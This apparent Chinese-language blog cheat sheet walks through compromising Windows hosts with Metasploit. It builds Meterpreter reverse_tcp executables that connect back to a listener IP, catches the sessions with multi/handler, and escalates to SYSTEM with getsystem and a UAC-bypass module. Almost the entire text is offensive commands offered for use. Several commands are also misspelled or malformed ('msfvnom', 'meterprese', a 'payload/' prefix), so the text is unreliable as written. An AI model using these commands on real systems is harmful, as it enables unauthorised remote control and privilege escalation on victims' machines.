一、 远控
a) X86
msfvnom –p payload/windows/meterpreter/reverse_tcp # 32位
msfvnom –p payload/windows/x64/meterpreter/reverse_tcp # 64位
i. LHOST=192.168.135.129 #指定反弹shell地址
ii. LPORT=4444 #指定反弹shell端口
iii. –f exe #生成文件类型
iv. –o /root/DeskTop/name.exe #生成路径及文件名
二、 建立会话
a) use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
i. set LHOST 192.168.135.129 #监听地址
ii. set LPORT 4444 #监听端口
iii. exploit / run #执行
iv. background #挂起会话
三、 提权
a) 命令(进入会话)
getuid #获取用户id
getsystem #获取sys权限
1. –t 0 # 所有可用的技术(1,2,3)
2. –t 1 # 命名管道模拟(在内存/管理中)
3. –t 2 # 被命名为管道模拟(下拉/admin)
4. –t 3 # 标记重复(在内存/管理中)
search bypassuac
b) 使用bypassuac(绕过用户帐户控制)
set payload windows/x64/meterprese/reverse_tcp
set target 1 #设置目标为x64,0:x86
本文连接:http://www.jianshu.com/p/11284bb8e231
版权声明:本文为简友原创文章,转载必须写明出处。